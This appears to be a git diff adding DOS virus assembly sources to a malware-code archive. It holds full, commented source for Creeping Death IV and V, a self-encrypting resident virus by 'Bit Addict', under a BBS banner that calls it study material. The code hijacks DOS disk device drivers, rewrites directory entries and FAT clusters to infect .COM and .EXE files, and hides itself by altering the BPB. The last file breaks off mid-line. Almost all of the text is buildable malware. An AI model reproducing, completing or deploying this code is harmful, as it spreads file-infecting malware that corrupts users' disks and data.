di,[bx+si+13h] + mov [bx+si+13h],offset header + mov [bx+si+15h],cs +next: lds bx,[bx+si+19h] + cmp bx,-1 + jne search + jcxz install + + pop ds + mov ax,ds + add ax,[3] + inc ax + mov dx,cs + dec dx + cmp ax,dx + jne no_boot + add [3],61h +no_boot: mov ds,dx + mov [1],8 + + mov ds,cx + les ax,[di+6] + mov cs:str_block,ax + mov cs:int_block,es + + cld + mov si,1 +scan: dec si + lodsw + cmp ax,1effh + jne scan + mov ax,2cah + cmp [si+4],ax + je right + cmp [si+5],ax + jne scan +right: lodsw + push cs + pop es + mov di,offset modify+1 + stosw + xchg ax,si + mov di,offset i13org + cli + movsw + movsw + + mov dx,0c000h +fdsk1: mov ds,dx + xor si,si + lodsw + cmp ax,0aa55h + jne fdsk4 + cbw + lodsb + mov cl,9 + sal ax,cl +fdsk2: cmp [si],6c7h + jne fdsk3 + cmp [si+2],4ch + jne fdsk3 + push dx + push [si+4] + jmp short death +install: int 20h +file: db "c:",255,0 +fdsk3: inc si + cmp si,ax + jb fdsk2 +fdsk4: inc dx + cmp dh,0f0h + jb fdsk1 + + sub sp,4 +death: push cs + pop ds + mov bx,[2ch] + mov es,bx + mov ah,49h + call jump + xor ax,ax + test bx,bx + jz boot + mov di,1 +seek: dec di + scasw + jne seek + lea si,[di+2] + jmp short exec +boot: mov es,[16h] + mov bx,es:[16h] + dec bx + xor si,si +exec: push bx + mov bx,offset param + mov [bx+4],cs + mov [bx+8],cs + mov [bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh + mov dx,offset file + call jump + pop dx + + mov ax,4b00h + call jump + mov ah,4dh + call jump + mov ah,4ch + +jump: pushf + call dword ptr cs:[i21org] + ret + + +;--------Installation complete + +i13pr: mov ah,3 + jmp dword ptr cs:[i13org] + + +main: push ax ; driver + push cx ; strategy block + push dx + push ds + push si + push di + + push es + pop ds + mov al,[bx+2] + + cmp al,4 ; Input + je input + cmp al,8 + je output + cmp al,9 + je output + + call in + cmp al,2 ; Build BPB + jne ppp ; + lds si,[bx+12h] + mov di,offset bpb_buf + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,[di+2-32] + cmp al,2 + adc al,0 + cbw + cmp [di+8-32],0 + je m32 + sub [di+8-32],ax + jmp short ppp +m32: sub [di+15h-32],ax + sbb [di+17h-32],0 + +ppp: pop di + pop si + pop ds + pop dx + pop cx + pop ax +rts: retf + +output: mov cx,0ff09h + call check + jz inf_sec + call in + jmp short inf_dsk + +inf_sec: jmp _inf_sec +read: jmp _read +read_: add sp,16 + jmp short ppp + +input: call check + jz read +inf_dsk: mov byte ptr [bx+2],4 + cld + lea si,[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov [bx+14h],1 + call driver + jnz read_ + mov byte ptr [bx+2],2 + call in + lds si,[bx+12h] + mov ax,[si+6] + add ax,15 + mov cl,4 + shr ax,cl + mov di,[si+0bh] + add di,di + stc + adc di,ax + push di + cwd + mov ax,[si+8] + test ax,ax + jnz more + mov ax,[si+15h] + mov dx,[si+17h] +more: xor cx,cx + sub ax,di + sbb dx,cx + mov cl,[si+2] + div cx + cmp cl,2 + sbb ax,-1 + push ax + call convert + mov byte ptr es:[bx+2],4 + mov es:[bx+14h],ax + call driver +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl + adc dx,ax + mov cs:gad+1,dx + cmp cl,1 + je small + mov ax,[si] + and ax,di + cmp ax,0fff7h + je bad + cmp ax,0ff7h + je bad + cmp ax,0ff70h + jne ok +bad: pop ax + dec ax + push ax + call convert + jmp short again +small: not di + and [si],di + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or [si],ax + pop ax + call convert + mov si,es:[bx+0eh] + add si,dx + mov ax,[si] + and ax,di +ok: mov dx,di + dec dx + and dx,di + not di + and [si],di + or [si],dx + + cmp ax,dx + pop ax + pop di + mov cs:pointer+1,ax + je _read_ + mov dx,[si] + push ds + push si + call write + pop si + pop ds + jnz _read_ + call driver + cmp [si],dx + jne _read_ + dec ax + dec ax + mul cx + add ax,di + adc dx,0 + push es + pop ds + mov [bx+12h],2 + mov [bx+14h],ax + test dx,dx + jz less + mov [bx+14h],-1 + mov [bx+1ah],ax + mov [bx+1ch],dx +less: mov [bx+10h],cs + mov [bx+0eh],100h + call write + +_read_: std + lea di,[bx+1ch] + mov cx,8 +load: pop ax + stosw + loop load +_read: call in + + mov cx,9 +_inf_sec: + mov di,es:[bx+12h] + lds si,es:[bx+0eh] + sal di,cl + xor cl,cl + add di,si + xor dl,dl + push ds + push si + call find + jcxz no_inf + call write + and es:[bx+4],byte ptr 07fh +no_inf: pop si + pop ds + inc dx + call find + jmp ppp + +;--------Subroutines + +find: mov ax,[si+8] + cmp ax,"XE" + jne com + cmp [si+10],al + je found +com: cmp ax,"OC" + jne go_on + cmp byte ptr [si+10],"M" + jne go_on +found: test [si+1eh],0ffc0h ; >4MB + jnz go_on + test [si+1dh],03ff8h ; <2048B + jz go_on + test [si+0bh],byte ptr 1ch + jnz go_on + test dl,dl + jnz rest +pointer: mov ax,1234h + cmp ax,[si+1ah] + je go_on + xchg ax,[si+1ah] +gad: xor ax,1234h + mov [si+14h],ax + loop go_on +rest: xor ax,ax + xchg ax,[si+14h] + xor ax,cs:gad+1 + mov [si+1ah],ax +go_on: ;rol cs:gad+1,1 + db 2eh,0d1h,6 + dw offset gad+1 + add si,32 + cmp di,si + jne find + ret + +check: mov ah,[bx+1] +drive: cmp ah,-1 + mov cs:[drive+2],ah + jne changed + push [bx+0eh] + mov byte ptr [bx+2],1 + call in + cmp byte ptr [bx+0eh],1 + pop [bx+0eh] + mov [bx+2],al +changed: ret + +write: cmp byte ptr es:[bx+2],8 + jae in + mov byte ptr es:[bx+2],4 + mov si,70h + mov ds,si +modify: mov si,1234h + push [si] + push [si+2] + mov [si],offset i13pr + mov [si+2],cs + call in + pop [si+2] + pop [si] + ret + +driver: mov es:[bx+12h],1 +in: + db 09ah +str_block: + dw ?,70h + db 09ah +int_block: + dw ?,70h + test es:[bx+4],byte ptr 80h + ret + +convert: cmp ax,0ff0h + jae fat_16 + mov si,3 + xor cs:[si+gad-1],si + mul si + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si +header: inc ax + ret + +counter: dw 0 + + dw 842h + dw offset main + dw offset rts + db 7fh + +param: dw 0,80h,?,5ch,?,6ch,? + +bpb_buf: db 32 dup(?) +f_name: db 80 dup(?) + +;--------The End. + +MsDos \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset4.asm b/MSDOS/Virus.MSDOS.Unknown.cdset4.asm new file mode 100644 index 00000000..2a2c55aa --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdset4.asm @@ -0,0 +1,655 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; +;*****************************************************************************; +; ; +; Creeping Death IV (Encrypting, try to find it) ; +; ; +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code + org 100h + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov bx,offset Main-9 +Repeat: xor byte ptr [bx+8],bl + inc bx + jnz Repeat + +Main: mov sp,600h ; init stack + inc Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Install: int 20h + +;*****************************************************************************; +; ; +; An file is opend with this name, but the file will not be found. ; +; ; +;*****************************************************************************; + +File: db "C:",255,0 + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz install + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header + movsw + lodsw + mov es:StrBlock,ax + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; =0 ? + jz Boot + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax + mov di,1 +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename + jmp short Exec + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 + jnb Exec + mov ax,cs + dec ax + mov ds,ax + mov cx,8 + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cx + and cx,7 +NextByte: mov si,8 + inc di + push di + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di + cmp byte ptr es:[di-1],0 + jne BeginName + mov si,di + mov bx,es +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h + mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. ; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx + mov cs:RequestSegment,es + retf + +Interrupt: push ax ; driver strategy block + push bx + push cx ; save registers + push dx + push si + push di + push ds + push es + + les bx,cs:Request + push es + pop ds + mov al,ds:[bx+2] ; Command Code + + cmp al,4 ; Input + je Input + cmp al,8 ; Output + je Output + cmp al,9 + je Output + + call DoRequest + + cmp al,2 ; Build BPB + jne Return + lds si,ds:[bx+12h] ; copy the BPB and change it + mov di,offset bpb_buf ; into one that hides the virus + mov es:[bx+12h],di + mov es:[bx+14h],cs + push es ; copy + push cs + pop es + mov cx,16 + rep movsw + pop es + push cs + pop ds + mov al,ds:[di+2-32] ; change + cmp al,2 + adc al,0 + cbw + cmp word ptr ds:[di+8-32],0 ; >32mb partition ? + je m32 ; yes, jump to m32 + sub ds:[di+8-32],ax ; <32mb partition + jmp short Return +m32: sub ds:[di+15h-32],ax ; >32mb partition + sbb word ptr ds:[di+17h-32],0 +Return: pop es ; return to caller + pop ds + pop di + pop si + pop dx + pop cx + pop bx + pop ax + retf + +Output: mov cx,0ff09h ; check if disk changed + call check + jz InfectSector ; no, just infect sector + call DoRequest ; yes, write virus to disk + jmp short inf_dsk + +InfectSector: jmp _InfectSector ; infect sector +Read: jmp _Read ; read sector +ReadError: add sp,16 ; error during request + jmp short Return + +Input: call check ; check if disk changed + jz Read ; no, read sector +inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk + cld ; save last part of request + lea si,ds:[bx+0eh] + mov cx,8 +save: lodsw + push ax + loop save + mov word ptr ds:[bx+14h],1 ; read 1st sector on disk + call ReadSector + jnz ReadError + mov byte ptr ds:[bx+2],2 ; build BPB + call DoRequest + lds si,ds:[bx+12h] ; ds:si = BPB + mov di,ds:[si+6] ; size of root directory + add di,15 ; in sectors + mov cl,4 + shr di,cl + mov al,ds:[si+5] + cbw + mov dx,ds:[si+0bh] + mul dx ; ax=fat sectors, dx=0 + add ax,ds:[si+3] + add di,ax + push di ; save it on stack + mov ax,ds:[si+8] ; total number of sectors + cmp ax,dx ; >32mb + jnz more ; no, skip next 2 instructions + mov ax,ds:[si+15h] ; get number of sectors + mov dx,ds:[si+17h] +more: xor cx,cx ; cx=0 + sub ax,di ; dx:ax=number is data sectors + sbb dx,cx + mov cl,ds:[si+2] ; cx=sectors / cluster + div cx ; number of clusters on disk + cmp cl,2 ; 1 sector/cluster ? + sbb ax,-1 ; number of clusters (+1 or +2) + push ax ; save it on stack + call Convert ; get fat sector and offset in + mov byte ptr es:[bx+2],4 ; sector + mov es:[bx+14h],ax + call ReadSector ; read fat sector +again: lds si,es:[bx+0eh] + add si,dx + sub dh,cl ; has something to do with the + adc dx,ax ; encryption of the pointers + mov word ptr cs:[gad+1],dx + cmp cl,1 ; 1 sector / cluster + jne Ok +SmallModel: not di ; this is used when the + and ds:[si],di ; clusters are 1 sector long + pop ax + push ax + inc ax + push ax + mov dx,0fh + test di,dx + jz here + inc dx + mul dx +here: or ds:[si],ax + pop ax + call Convert + mov si,es:[bx+0eh] + add si,dx +Ok: mov ax,ds:[si] + and ax,di + mov dx,di ; allocate cluster + dec dx + and dx,di + not di + and ds:[si],di + or ds:[si],dx + cmp ax,dx ; cluster already allocated by + pop ax ; the virus ? + pop di + mov word ptr cs:[pointer+1],ax + je _Read_ ; yes, don't write it and go on + mov dx,ds:[si] + push ds + push si + mov byte ptr es:[bx+2],8 ; write + call DoRequest ; write the adjusted sector to + pop si ; disk + pop ds + jnz _Read_ + call ReadSector ; read it again + cmp ds:[si],dx ; is it written correctly ? + jne _Read_ ; no, can't infect disk + dec ax + dec ax ; calculate the sector number + mul cx ; to write the virus to + add ax,di + adc dx,0 + push es + pop ds + mov word ptr ds:[bx+12h],2 + mov ds:[bx+14h],ax ; store it in the request hdr + test dx,dx + jz less + mov word ptr ds:[bx+14h],-1 + mov ds:[bx+1ah],ax + mov ds:[bx+1ch],dx +less: mov ds:[bx+10h],cs + mov ds:[bx+0eh],100h + mov byte ptr es:[bx+2],8 ; write it + call EncryptWrite1 + +_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte + std ; restore other part of the + lea di,ds:[bx+1ch] ; request + mov cx,8 +load: pop ax + stosw + loop load +_Read: call DoRequest ; do request + + mov cx,9 +_InfectSector: mov di,es:[bx+12h] ; get number of sectors read + lds si,es:[bx+0eh] ; get address of data + sal di,cl ; calculate end of buffer + xor cl,cl + add di,si + xor dl,dl + push ds ; infect the sector + push si + call find + jcxz no_inf ; write sector ? + mov al,8 + xchg al,es:[bx+2] ; save command byte + call DoRequest ; write sector + mov es:[bx+2],al ; restore command byte + and byte ptr es:[bx+4],07fh +no_inf: pop si + pop ds + inc dx ; disinfect sector in memory + call find + jmp Return ; return to caller + +;*****************************************************************************; +; ; +; Subroutines ; +; ; +;*****************************************************************************; + +find: mov ax,ds:[si+8] ; (dis)infect sector in memory + cmp ax,"XE" ; check for .exe + jne com + cmp ds:[si+10],al + je found +com: cmp ax,"OC" ; check for .com + jne go_on + cmp byte ptr ds:[si+10],"M" + jne go_on +found: test word ptr ds:[si+1eh],0ffc0h ; file to big + jnz go_on ; more than 4mb + test word ptr ds:[si+1dh],03ff8h ; file to small + jz go_on ; less than 2048 bytes + test byte ptr ds:[si+0bh],1ch ; directory, system or + jnz go_on ; volume label + test dl,dl ; infect or disinfect ? + jnz rest +pointer: mov ax,1234h ; ax = viral cluster + cmp ax,ds:[si+1ah] ; file already infected ? + je go_on ; yes, go on + xchg ax,ds:[si+1ah] ; exchange pointers +gad: xor ax,1234h ; encryption + mov ds:[si+14h],ax ; store it on another place + loop go_on ; change cx and go on +rest: xor ax,ax ; ax = 0 + xchg ax,ds:[si+14h] ; get pointer + xor ax,word ptr cs:[gad+1] ; Encrypt + mov ds:[si+1ah],ax ; store it on the right place +go_on: rol word ptr cs:[gad+1],1 ; change encryption + add si,32 ; next directory entry + cmp di,si ; end of buffer ? + jne find ; no, do it again + ret ; return + +check: mov ah,ds:[bx+1] ; get number of unit +drive: cmp ah,-1 ; same as last call ? + mov byte ptr cs:[drive+2],ah ; set 2nd parameter + jne changed + push ds:[bx+0eh] ; save word + mov byte ptr ds:[bx+2],1 ; disk changed ? + call DoRequest + cmp byte ptr ds:[bx+0eh],1 ; 1=Yes + pop ds:[bx+0eh] ; restore word + mov ds:[bx+2],al ; restore command +changed: ret ; return + +ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk + +DoRequest: db 09ah ; call 70:?, orginal strategy +StrBlock dw ?,70h + db 09ah ; call 70:?, orginal interrupt +IntBlock dw ?,70h + test byte ptr es:[bx+4],80h ; error ? yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae fat_16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc cont + mov di,0fff0h + jmp short cont +fat_16: mov si,2 + mul si + mov di,0ffffh +cont: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds + push cs + pop ds + push es + push cs + pop es + cld + mov cx,9 + mov si,offset Encrypt + mov di,offset EncryptWrite2 + mov al,ds:[si+5] + add al,11 + mov ds:[si+5],al + cbw + mov dx,offset Main-1 + sub dx,ax + mov ds:[si+1],dx + rep movsb + mov cl,10 + mov si,offset DoRequest + rep movsb + mov cl,9 + mov si,offset Encrypt + rep movsb + mov ax,0c31fh + stosw + pop es + jmp EncryptWrite2 + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Header db 7 dup(?) ; this is the header for the + ; device driver + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + +bpb_buf: db 32 dup(?) ; buffer for BPB +EncryptWrite2: db 30 dup(?) +f_name: db 80 dup(?) ; Buffer for the filename used + ; by the exec-function + + + +;*****************************************************************************; +; ; +; The End ; +; ; +;*****************************************************************************; + +code ends + +end Encrypt + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪; +;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪; +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪; + diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset5.asm b/MSDOS/Virus.MSDOS.Unknown.cdset5.asm new file mode 100644 index 00000000..57aa91b0 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cdset5.asm @@ -0,0 +1,661 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] CoSysOp: Northstar Ken [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;*****************************************************************************; +; ; +; Creeping Death V (Encrypting, try to find it) ; +; (Version 4 bug Fixed) : +; (c) Copyright 1992 by Bit Addict ; +; ; +;*****************************************************************************; + +code segment public 'code' + assume cs:code, ds:code, es:code + org 5ch + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +BPB_Buf: db 32 dup(?) ; buffer for BPB +EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt + +Request equ this dword ; address of the request header +RequestOffset dw ? +RequestSegment dw ? + + org 100h + +;*****************************************************************************; +; ; +; Actual start of virus. In this part the virus initializes the stack and ; +; adjusts the device driver used by dos to read and write from floppy's and ; +; hard disks. Then it will start the orginal exe or com-file ; +; ; +;*****************************************************************************; + +Encrypt: mov si,offset Main-1 + mov cx,400h-11 +Repeat: xor byte ptr [si],0 + inc si + loop Repeat + +Main: mov sp,600h ; init stack + inc Counter + +;*****************************************************************************; +; ; +; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ; +; si will be -1 ; +; ; +;*****************************************************************************; + +DosVersion: mov ah,30h ; fn 30h = Get Dosversion + int 21h ; int 21h + cmp al,4 ; major dosversion + sbb di,di + mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,?? + +;*****************************************************************************; +; ; +; Adjust the size of the codesegment, with dos function 4ah ; +; ; +;*****************************************************************************; + + mov bx,60h ; Adjust size of memory block + mov ah,4ah ; to 60 paragraphs = 600h bytes + int 21h ; int 21h + + mov ah,52h ; get internal list of lists + int 21h ; int 21h + +;*****************************************************************************; +; ; +; If the virus code segment is located behind the dos config memory block the ; +; code segment will be part of the config memory block making it 61h ; +; paragraphs larger. If the virus is not located next to the config memory ; +; block the virus will set the owner to 8h (Dos system) ; +; ; +;*****************************************************************************; + + mov ax,es:[bx-2] ; segment of first MCB + mov dx,cs ; dx = MCB of the code segment + dec dx +NextMCB: mov ds,ax ; ax = segment next MCB + add ax,ds:[3] + inc ax + cmp ax,dx ; are they equal ? + jne NextMCB ; no, not 1st program executed + cmp word ptr ds:[1],8 + jne NoBoot + add word ptr ds:[3],61h ; add 61h to size of block +NoBoot: mov ds,dx ; ds = segment of MCB + mov word ptr ds:[1],8 ; owner = dos system + +;*****************************************************************************; +; ; +; The virus will search for the disk paramenter block for drive a: - c: in ; +; order to find the device driver for these block devices. If any of these ; +; blocks is found the virus will install its own device driver and set the ; +; access flag to -1 to tell dos this device hasn't been accesed yet. ; +; ; +;*****************************************************************************; + + cld ; clear direction flag + lds bx,es:[bx] ; get pointer to first drive + ; paramenter block + +Search: cmp bx,-1 ; last block ? + je Last + mov ax,ds:[bx+di+15h] ; get segment of device header + cmp ax,70h ; dos device header ?? + jne Next ; no, go to next device + xchg ax,cx + mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive + ; has not been accessed" + mov si,offset Header-4 ; set address of new device + xchg si,ds:[bx+di+13h] ; and save old address + mov ds:[bx+di+15h],cs +Next: lds bx,ds:[bx+di+19h] ; next drive parameter block + jmp Search + +;*****************************************************************************; +; ; +; If the virus has failed in starting the orginal exe-file it will jump here. ; +; ; +;*****************************************************************************; + +Boot: mov ds,ds:[16h] ; es = parent PSP + mov bx,ds:[16h] ; bx = parent PSP of Parent PSP + xor si,si + sub bx,1 + jnb Exec + mov ax,cs + dec ax + mov ds,ax + mov cx,8 + mov si,8 + mov di,0ffh +Count: lodsb + or al,al + loopne Count + not cx + and cx,7 +NextByte: mov si,8 + inc di + push di + push cx + rep cmpsb + pop cx + pop di + jne NextByte +BeginName: dec di + cmp byte ptr es:[di-1],0 + jne BeginName + mov si,di + mov bx,es + jmp short Exec + +;*****************************************************************************; +; ; +; If none of these devices is found it means the virus is already resident ; +; and the virus wasn't able to start the orginal exe-file (the file is ; +; corrupted by copying it without the virus memory resident). If the device ; +; is found the information in the header is copied. ; +; ; +;*****************************************************************************; + +Last: jcxz Exit + +;*****************************************************************************; +; ; +; The information about the dos device driver is copyed to the virus code ; +; segment ; +; ; +;*****************************************************************************; + + mov ds,cx ; ds = segment of Device Driver + add si,4 + push cs + pop es + mov di,offset Header + movsw + lodsw + mov es:StrBlock,ax + mov ax,offset Strategy + stosw + lodsw + mov es:IntBlock,ax + mov ax,offset Interrupt + stosw + movsb + +;*****************************************************************************; +; ; +; Deallocate the environment memory block and start the this file again, but ; +; if the virus succeeds it will start the orginal exe-file. ; +; ; +;*****************************************************************************; + + push cs + pop ds + mov bx,ds:[2ch] ; environment segment + or bx,bx ; =0 ? + jz Boot + mov es,bx + mov ah,49h ; deallocate memory + int 21h + xor ax,ax + mov di,1 +Seek: dec di ; scan for end of environment + scasw + jne Seek + lea si,ds:[di+2] ; es:si = start of filename +Exec: push bx + push cs + pop ds + mov bx,offset Param + mov ds:[bx+4],cs ; set segments in EPB + mov ds:[bx+8],cs + mov ds:[bx+12],cs + pop ds + push cs + pop es + + mov di,offset f_name ; copy name of this file + push di + mov cx,40 + rep movsw + push cs + pop ds + + mov ah,3dh ; open file, this file will + mov dx,offset File ; not be found but the entire + int 21h ; directory is searched and + pop dx ; infected + + mov ax,4b00h ; execute file + int 21h +Exit: mov ah,4dh ; get exit-code + int 21h + mov ah,4ch ; terminate (al = exit code) + int 21h + +;*****************************************************************************; +; ; +; Installation complete ; +; ; +;*****************************************************************************; +; ; +; The next part contains the device driver used by creeping death to infect ; +; directory's ; +; ; +; The device driver uses only the strategy routine to handle the requests. ; +; I don't know if this is because the virus will work better or the writer ; +; of this virus didn't know how to do it right. ; +; ; +;*****************************************************************************; + + +Strategy: mov cs:RequestOffset,bx + mov cs:RequestSegment,es + retf + +Interrupt: push ax ; driver strategy block + push bx + push cx ; save registers + push dx + push si + push di + push ds + push es + + les bx,cs:Request + push es + pop ds + mov al,ds:[bx+2] ; Command Code + + cmp al,4 ; Input + je Input + cmp al,8 ; Output + je Output + cmp al,9 + je Output + + call DoRequest + + cmp al,2 ; Build 